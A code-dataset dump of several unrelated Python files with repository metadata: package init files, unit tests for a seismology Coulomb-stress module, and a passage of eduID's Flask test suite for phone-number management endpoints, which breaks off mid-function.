] | null | null | null | actioneer/__init__.py | vbe0201/Actioneer | 96df066ea40d2a51b1abb4bde2504af23c2c7c82 | [
"MIT"
] | null | null | null | """TODO: Description here"""
from .action import *
from .argument import *
from .errors import *
from .performer import *
from .utils import *
| 16.111111 | 28 | 0.710345 | 18 | 145 | 5.722222 | 0.555556 | 0.38835 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172414 | 145 | 8 | 29 | 18.125 | 0.858333 | 0.151724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a005246b0a136e44579b6cbf5af01f3da0db58fc | 87 | py | Python | ImageClassifier/__init__.py | pranav377/image-classifier | f3f83fcb5ba971c40b1c4bc94c0805422a2c3d7a | [
"MIT"
] | 4 | 2021-02-10T07:16:29.000Z | 2021-11-16T20:56:04.000Z | ImageClassifier/__init__.py | pranav377/image-classifier | f3f83fcb5ba971c40b1c4bc94c0805422a2c3d7a | [
"MIT"
] | null | null | null | ImageClassifier/__init__.py | pranav377/image-classifier | f3f83fcb5ba971c40b1c4bc94c0805422a2c3d7a | [
"MIT"
] | null | null | null | from ImageClassifier.img import CreateDataAndModel
from ImageClassifier.img import Run | 43.5 | 51 | 0.885057 | 10 | 87 | 7.7 | 0.6 | 0.493506 | 0.571429 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091954 | 87 | 2 | 52 | 43.5 | 0.974684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
4ecec012951a83217e780a21ed662a1f31606176 | 3,082 | py | Python | seistools/tests/coulomb_test.py | egdaub/seistools | 9ec61de03c2231760dba6a42e7fa2018309a99f3 | [
"MIT"
] | 2 | 2021-04-18T03:28:24.000Z | 2021-11-19T12:32:31.000Z | seistools/tests/coulomb_test.py | egdaub/seistools | 9ec61de03c2231760dba6a42e7fa2018309a99f3 | [
"MIT"
] | null | null | null | seistools/tests/coulomb_test.py | egdaub/seistools | 9ec61de03c2231760dba6a42e7fa2018309a99f3 | [
"MIT"
] | 2 | 2021-04-18T03:28:26.000Z | 2022-01-05T03:17:52.000Z | from unittest import TestCase
import numpy as np
import seistools.coulomb
class TestCoulomb(TestCase):
def test_tangent_2d(self):
self.assertIs(type(seistools.coulomb.tangent_2d((1., 0.))), np.ndarray)
np.testing.assert_array_almost_equal_nulp(seistools.coulomb.tangent_2d((1., 0.)), np.array([0., 1.]))
np.testing.assert_array_almost_equal_nulp(seistools.coulomb.tangent_2d((0., 1.)), np.array([-1., 0.]))
np.testing.assert_array_almost_equal_nulp(seistools.coulomb.tangent_2d((1./np.sqrt(2.), 1./np.sqrt(2.))),
np.array([-1./np.sqrt(2.), 1./np.sqrt(2.)]))
np.testing.assert_array_almost_equal_nulp(seistools.coulomb.tangent_2d((1./np.sqrt(2.), -1./np.sqrt(2.))),
np.array([1./np.sqrt(2.), 1./np.sqrt(2.)]))
self.assertRaises(AssertionError, seistools.coulomb.tangent_2d, (1.,))
self.assertRaises(AssertionError, seistools.coulomb.tangent_2d, (1., 0., 0.))
self.assertRaises(AssertionError, seistools.coulomb.tangent_2d, (0.5, 0.))
def test_rotate_xy2nt_2d(self):
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.rotate_xy2nt_2d(1., 1., 0., (1., 0.))),
np.array((1., 1.)))
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.rotate_xy2nt_2d(0., 1., 1., (0., 1.))),
np.array((1., -1.)))
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.rotate_xy2nt_2d(-1., 0.5, -1.,
(1./np.sqrt(2.), 1./np.sqrt(2.)))),
np.array((-0.5, 0.)))
self.assertRaises(AssertionError, seistools.coulomb.rotate_xy2nt_2d, 1., 0., 0., (1., 0., 0.))
self.assertRaises(AssertionError, seistools.coulomb.rotate_xy2nt_2d, 1., 0., 0., (1., 1.))
self.assertRaises(AssertionError, seistools.coulomb.rotate_xy2nt_2d, 1., 0., 0., (1.,))
def test_coulomb_2d(self):
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.coulomb_2d(1., 1., 0., (1., 0.), 0.5)),
np.array(1.5))
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.coulomb_2d(0., 1., 1., (0., 1.), 0.2)),
np.array((-0.8)))
np.testing.assert_array_almost_equal_nulp(np.array(seistools.coulomb.coulomb_2d(-1., 0.5, -1.,
(1./np.sqrt(2.), 1./np.sqrt(2.)), 1.)), np.array(-0.5))
self.assertRaises(AssertionError, seistools.coulomb.coulomb_2d, 1., 0., 0., (1., 0., 0.), 0.)
self.assertRaises(AssertionError, seistools.coulomb.coulomb_2d, 1., 0., 0., (1., 1.), 0.)
self.assertRaises(AssertionError, seistools.coulomb.coulomb_2d, 1., 0., 0., (1.,), 0.)
self.assertRaises(AssertionError, seistools.coulomb.coulomb_2d, 1., 0., 0., (1., 0.), -1.)
| 70.045455 | 137 | 0.570733 | 407 | 3,082 | 4.140049 | 0.085995 | 0.029674 | 0.028487 | 0.056973 | 0.880119 | 0.872997 | 0.859941 | 0.835015 | 0.738872 | 0.738872 | 0 | 0.068172 | 0.252758 | 3,082 | 43 | 138 | 71.674419 | 0.663482 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.567568 | 1 | 0.081081 | false | 0 | 0.081081 | 0 | 0.189189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
14f0824001f673f1c1a8110df361da0210d74056 | 173 | py | Python | finmarketpy/curve/__init__.py | Joukahainen/finmarketpy | 59e340e1411edceba121a0943fb500d8bda2c6f2 | [
"Apache-2.0"
] | 1,701 | 2016-08-17T15:45:40.000Z | 2022-03-30T14:05:21.000Z | finmarketpy/curve/__init__.py | Joukahainen/finmarketpy | 59e340e1411edceba121a0943fb500d8bda2c6f2 | [
"Apache-2.0"
] | 26 | 2017-01-09T18:54:27.000Z | 2021-06-29T15:32:03.000Z | finmarketpy/curve/__init__.py | Joukahainen/finmarketpy | 59e340e1411edceba121a0943fb500d8bda2c6f2 | [
"Apache-2.0"
] | 342 | 2016-09-01T11:36:00.000Z | 2022-03-27T00:56:55.000Z | from finmarketpy.curve.abstractcurve import AbstractCurve
from finmarketpy.curve.fxforwardscurve import FXForwardsCurve
from finmarketpy.curve.fxspotcurve import FXSpotCurve | 57.666667 | 61 | 0.901734 | 18 | 173 | 8.666667 | 0.388889 | 0.288462 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063584 | 173 | 3 | 62 | 57.666667 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
14feeb412612f302ccd876cc5f15b9cb471f3d18 | 30,776 | py | Python | src/eduid_webapp/phone/tests/test_app.py | SUNET/eduid-webapp | 8e531f288d50d18a5c9182003fff2ab6670a44c3 | [
"BSD-3-Clause"
] | null | null | null | src/eduid_webapp/phone/tests/test_app.py | SUNET/eduid-webapp | 8e531f288d50d18a5c9182003fff2ab6670a44c3 | [
"BSD-3-Clause"
] | 161 | 2017-04-13T07:56:38.000Z | 2021-03-12T13:46:38.000Z | src/eduid_webapp/phone/tests/test_app.py | SUNET/eduid-webapp | 8e531f288d50d18a5c9182003fff2ab6670a44c3 | [
"BSD-3-Clause"
] | 3 | 2016-05-16T20:25:49.000Z | 2018-07-27T12:10:58.000Z | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 NORDUnet A/S
# Copyright (c) 2018 SUNET
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# 3. Neither the name of the NORDUnet nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import json
from typing import Any, Dict, Mapping, Optional
from urllib.parse import quote_plus
from mock import patch
from eduid_common.api.testing import EduidAPITestCase
from eduid_webapp.phone.app import PhoneApp, phone_init_app
from eduid_webapp.phone.helpers import PhoneMsg
class PhoneTests(EduidAPITestCase):
app: PhoneApp
def setUp(self):
super(PhoneTests, self).setUp(copy_user_to_private=True)
def load_app(self, config: Mapping[str, Any]) -> PhoneApp:
"""
Called from the parent class, so we can provide the appropriate flask
app for this test case.
"""
return phone_init_app('testing', config)
def update_config(self, config: Dict[str, Any]) -> Dict[str, Any]:
config.update(
{
'available_languages': {'en': 'English', 'sv': 'Svenska'},
'msg_broker_url': 'amqp://dummy',
'am_broker_url': 'amqp://dummy',
'celery_config': {'result_backend': 'amqp', 'task_serializer': 'json'},
'phone_verification_timeout': 7200,
'default_country_code': '46',
'throttle_resend_seconds': 300,
}
)
return config
# parameterized test methods
def _get_all_phone(self, eppn: Optional[str] = None):
"""
GET all phone data for some user
:param eppn: eppn for the user
"""
response = self.browser.get('/all')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = eppn or self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
response2 = client.get('/all')
return json.loads(response2.data)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
    def _post_phone(
        self,
        mock_sendsms: Any,
        mock_code_verification: Any,
        mock_request_user_sync: Any,
        mod_data: Optional[dict] = None,
        send_data: bool = True,
    ):
        """
        POST phone data to add a new phone number to the test user

        Note: mock.patch decorators inject mocks bottom-up, so the first
        argument is the sendsms mock, the second get_short_hash, and the
        third request_user_sync.

        :param mod_data: to control what data is POSTed
        :param send_data: whether to POST any data at all
        """
        mock_sendsms.return_value = True
mock_code_verification.return_value = u'5250f9a4'
mock_request_user_sync.side_effect = self.request_user_sync
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': '+34670123456',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
if mod_data:
data.update(mod_data)
if send_data:
return client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
return client.post('/new')
@patch('eduid_common.api.am.AmRelay.request_user_sync')
def _post_primary(self, mock_request_user_sync: Any, mod_data: Optional[dict] = None):
"""
Set phone number as the primary number for the test user
:param mod_data: to control what data is POSTed
"""
mock_request_user_sync.side_effect = self.request_user_sync
response = self.browser.post('/primary')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
if mod_data:
data.update(mod_data)
return client.post('/primary', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
def _remove(self, mock_request_user_sync: Any, mod_data: Optional[dict] = None):
"""
Remove phone number from the test user
:param mod_data: to control what data is POSTed
"""
mock_request_user_sync.side_effect = self.request_user_sync
response = self.browser.post('/remove')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
if mod_data:
data.update(mod_data)
return client.post('/remove', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _resend_code(
self,
mock_phone_validator: Any,
mock_request_user_sync: Any,
mock_code_verification: Any,
mod_data: Optional[dict] = None,
):
"""
Send a POST request to trigger re-sending a verification code for an unverified phone number in the test user.
:param mod_data: to control the data to be POSTed
"""
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'5250f9a4'
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
if mod_data:
data.update(mod_data)
return client.post('/resend-code', data=json.dumps(data), content_type=self.content_type_json)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def _get_code_backdoor(
self,
mock_phone_validator: Any,
mock_code_verification: Any,
mock_request_user_sync: Any,
mod_data: Optional[dict] = None,
phone: str = '+34670123456',
code: str = '5250f9a4',
):
"""
POST phone data to generate a verification state,
and try to get the generated code through the backdoor
:param mod_data: to control what data is POSTed
:param phone: the phone to use
:param code: mock verification code
"""
mock_phone_validator.return_value = True
mock_code_verification.return_value = code
mock_request_user_sync.side_effect = self.request_user_sync
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': phone,
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
if mod_data:
data.update(mod_data)
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
client.set_cookie('localhost', key=self.app.conf.magic_cookie_name, value=self.app.conf.magic_cookie)
phone = quote_plus(phone)
eppn = quote_plus(eppn)
return client.get(f'/get-code?phone={phone}&eppn={eppn}')
# actual tests
def test_get_all_phone(self):
phone_data = self._get_all_phone()
self.assertEqual('GET_PHONE_ALL_SUCCESS', phone_data['type'])
self.assertIsNotNone(phone_data['payload']['csrf_token'])
self.assertEqual('+34609609609', phone_data['payload']['phones'][0].get('number'))
self.assertEqual(True, phone_data['payload']['phones'][0].get('primary'))
self.assertEqual('+34 6096096096', phone_data['payload']['phones'][1].get('number'))
self.assertEqual(False, phone_data['payload']['phones'][1].get('primary'))
def test_post_phone_error_no_data(self):
response = self._post_phone(send_data=False)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
def test_post_phone_country_code(self):
response = self.browser.post('/new')
self.assertEqual(response.status_code, 302) # Redirect to token service
response = self._post_phone()
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+34670123456', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
def test_post_phone_no_country_code(self):
data = {'number': '0701234565'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
def test_post_phone_wrong_csrf(self):
data = {'csrf_token': 'wrong-token'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['CSRF failed to validate'], new_phone_data['payload']['error']['csrf_token'])
def test_post_phone_invalid(self):
data = {'number': '0'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['phone.phone_format'], new_phone_data['payload']['error']['number'])
def test_post_phone_as_verified(self):
data = {'verified': True}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+34670123456', new_phone_data['payload']['phones'][2].get('number'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('verified'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('primary'))
def test_post_phone_as_primary(self):
data = {'primary': True}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+34670123456', new_phone_data['payload']['phones'][2].get('number'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('verified'))
self.assertFalse(new_phone_data['payload']['phones'][2].get('primary'))
def test_post_phone_bad_swedish_mobile(self):
data = {'number': '0711234565'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['phone.swedish_mobile_format'], new_phone_data['payload']['error'].get('number'))
def test_post_phone_bad_country_code(self):
data = {'number': '00711234565'}
response = self._post_phone(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data['type'])
self.assertEqual(['phone.e164_format'], new_phone_data['payload']['error'].get('_schema'))
def test_post_primary(self):
response = self._post_primary()
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_PRIMARY_SUCCESS', new_phone_data['type'])
self.assertEqual(True, new_phone_data['payload']['phones'][0]['verified'])
self.assertEqual(True, new_phone_data['payload']['phones'][0]['primary'])
self.assertEqual(u'+34609609609', new_phone_data['payload']['phones'][0]['number'])
self.assertEqual(False, new_phone_data['payload']['phones'][1]['verified'])
self.assertEqual(False, new_phone_data['payload']['phones'][1]['primary'])
self.assertEqual(u'+34 6096096096', new_phone_data['payload']['phones'][1]['number'])
def test_post_primary_no_csrf(self):
data = {'csrf_token': ''}
response = self._post_primary(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_PRIMARY_FAIL', new_phone_data['type'])
self.assertEqual(['CSRF failed to validate'], new_phone_data['payload']['error']['csrf_token'])
def test_post_primary_unknown(self):
data = {'number': '+66666666666'}
response = self._post_primary(mod_data=data)
self.assertEqual(response.status_code, 200)
new_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_PRIMARY_FAIL', new_phone_data['type'])
self.assertEqual(PhoneMsg.unknown_phone.value, new_phone_data['payload']['message'])
def test_remove(self):
response = self._remove()
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_SUCCESS', delete_phone_data['type'])
self.assertEqual(u'+34 6096096096', delete_phone_data['payload']['phones'][0].get('number'))
def test_remove_primary_other_unverified(self):
data = {'number': '+34 6096096096'}
response = self._remove(mod_data=data)
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_SUCCESS', delete_phone_data['type'])
self.assertEqual(u'+34609609609', delete_phone_data['payload']['phones'][0].get('number'))
def test_remove_no_csrf(self):
data = {'csrf_token': ''}
response = self._remove(mod_data=data)
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_FAIL', delete_phone_data['type'])
self.assertEqual(['CSRF failed to validate'], delete_phone_data['payload']['error']['csrf_token'])
def test_remove_unknown(self):
data = {'number': '+33333333333'}
response = self._remove(mod_data=data)
self.assertEqual(response.status_code, 200)
delete_phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_REMOVE_FAIL', delete_phone_data['type'])
self.assertEqual('phones.unknown_phone', delete_phone_data['payload']['message'])
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_remove_primary_other_verified(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'12345'
response = self.browser.post('/remove')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': u'+34609123321',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': u'+34609123321', 'code': u'12345', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
verify_phone_data = json.loads(response2.data)
self.assertEqual('POST_PHONE_VERIFY_SUCCESS', verify_phone_data['type'])
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': '+34609609609', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/remove', data=json.dumps(data), content_type=self.content_type_json)
self.assertEqual(response2.status_code, 200)
delete_phone_data = json.loads(response2.data)
self.assertEqual('POST_PHONE_REMOVE_SUCCESS', delete_phone_data['type'])
self.assertEqual(u'+34 6096096096', delete_phone_data['payload']['phones'][0].get('number'))
def test_resend_code(self):
response = self.browser.post('/resend-code')
self.assertEqual(response.status_code, 302) # Redirect to token service
response = self._resend_code()
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_SUCCESS', phone_data['type'])
self.assertEqual(u'+34609609609', phone_data['payload']['phones'][0].get('number'))
self.assertEqual(u'+34 6096096096', phone_data['payload']['phones'][1].get('number'))
def test_resend_code_no_csrf(self):
data = {'csrf_token': 'wrong-token'}
response = self._resend_code(mod_data=data)
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', phone_data['type'])
self.assertEqual(['CSRF failed to validate'], phone_data['payload']['error']['csrf_token'])
def test_resend_code_unknown(self):
data = {'number': '+66666666666'}
response = self._resend_code(mod_data=data)
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', phone_data['type'])
self.assertEqual('user-out-of-sync', phone_data['payload']['message'])
def test_resend_code_throttle(self):
response = self._resend_code()
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_SUCCESS', phone_data['type'])
self.assertEqual(u'+34609609609', phone_data['payload']['phones'][0].get('number'))
self.assertEqual(u'+34 6096096096', phone_data['payload']['phones'][1].get('number'))
response = self._resend_code()
self.assertEqual(response.status_code, 200)
phone_data = json.loads(response.data)
self.assertEqual('POST_PHONE_RESEND_CODE_FAIL', phone_data['type'])
self.assertEqual(phone_data['error'], True)
self.assertEqual(phone_data['payload']['message'], 'still-valid-code')
self.assertIsNotNone(phone_data['payload']['csrf_token'])
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_verify(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'12345'
response = self.browser.post('/verify')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': u'+34609123321',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': u'+34609123321', 'code': u'12345', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
verify_phone_data = json.loads(response2.data)
self.assertEqual('POST_PHONE_VERIFY_SUCCESS', verify_phone_data['type'])
self.assertEqual(u'+34609123321', verify_phone_data['payload']['phones'][2]['number'])
self.assertEqual(True, verify_phone_data['payload']['phones'][2]['verified'])
self.assertEqual(False, verify_phone_data['payload']['phones'][2]['primary'])
self.assertEqual(self.app.proofing_log.db_count(), 1)
@patch('eduid_common.api.am.AmRelay.request_user_sync')
@patch('eduid_webapp.phone.verifications.get_short_hash')
@patch('eduid_common.api.msg.MsgRelay.sendsms')
def test_verify_fail(self, mock_phone_validator, mock_code_verification, mock_request_user_sync):
mock_phone_validator.return_value = True
mock_request_user_sync.side_effect = self.request_user_sync
mock_code_verification.return_value = u'12345'
response = self.browser.post('/verify')
self.assertEqual(response.status_code, 302) # Redirect to token service
eppn = self.test_user_data['eduPersonPrincipalName']
with self.session_cookie(self.browser, eppn) as client:
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {
'number': u'+34609123321',
'verified': False,
'primary': False,
'csrf_token': sess.get_csrf_token(),
}
client.post('/new', data=json.dumps(data), content_type=self.content_type_json)
with self.app.test_request_context():
with client.session_transaction() as sess:
data = {'number': u'+34609123321', 'code': u'wrong_code', 'csrf_token': sess.get_csrf_token()}
response2 = client.post('/verify', data=json.dumps(data), content_type=self.content_type_json)
verify_phone_data = json.loads(response2.data)
self.assertEqual(verify_phone_data['type'], 'POST_PHONE_VERIFY_FAIL')
self.assertEqual(verify_phone_data['payload']['message'], 'phones.code_invalid_or_expired')
self.assertEqual(self.app.proofing_log.db_count(), 0)
def test_post_phone_duplicated_number(self):
data = {'number': '0701234565'}
response1 = self._post_phone(mod_data=data)
self.assertEqual(response1.status_code, 200)
new_phone_data = json.loads(response1.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual(u'+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
eppn = self.test_user_data['eduPersonPrincipalName']
# Save above phone number for user in central db
user = self.app.private_userdb.get_user_by_eppn(eppn)
self.request_user_sync(user)
response2 = self._post_phone(mod_data=data)
self.assertEqual(response2.status_code, 200)
new_phone_data2 = json.loads(response2.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data2['type'])
self.assertEqual(['phone.phone_duplicated'], new_phone_data2['payload']['error'].get('number'))
def test_post_phone_duplicated_number_e_164(self):
data = {'number': '+46701234565'} # e164 format
response1 = self._post_phone(mod_data=data)
self.assertEqual(response1.status_code, 200)
new_phone_data = json.loads(response1.data)
self.assertEqual('POST_PHONE_NEW_SUCCESS', new_phone_data['type'])
self.assertEqual('+46701234565', new_phone_data['payload']['phones'][2].get('number'))
self.assertEqual(False, new_phone_data['payload']['phones'][2].get('verified'))
eppn = self.test_user_data['eduPersonPrincipalName']
# Save above phone number for user in central db
user = self.app.private_userdb.get_user_by_eppn(eppn)
self.request_user_sync(user)
data = {'number': '0701234565'} # National format
response2 = self._post_phone(mod_data=data)
self.assertEqual(response2.status_code, 200)
new_phone_data2 = json.loads(response2.data)
self.assertEqual('POST_PHONE_NEW_FAIL', new_phone_data2['type'])
self.assertEqual(['phone.phone_duplicated'], new_phone_data2['payload']['error'].get('number'))
def test_post_phone_duplicated_number_e_164_2(self):
        data = {'number': '0701234565'} # National format
